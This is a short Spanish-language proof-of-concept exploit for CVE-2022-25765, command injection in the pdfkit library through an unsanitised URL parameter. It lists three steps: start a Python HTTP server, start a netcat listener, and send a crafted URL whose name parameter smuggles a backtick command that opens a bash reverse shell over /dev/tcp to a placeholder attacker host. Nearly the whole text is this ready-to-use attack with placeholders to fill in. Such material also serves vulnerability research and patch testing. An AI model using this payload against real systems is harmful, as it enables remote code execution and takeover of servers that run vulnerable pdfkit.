
Exploit de prueba de concepto para CVE-2022-25765 que demuestra la inyección de comandos en pdfkit 0.8.6 a través de un parámetro URL sin sanitizar, lo que permite la ejecución remota de código y una shell inversa.
El paquete pdfkit desde 0.0.0 es vulnerable a Inyección de Comandos donde la URL no está debidamente saneada.
1- python3 -m http.server 80
2- nc -lnvp 'Target Port'
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}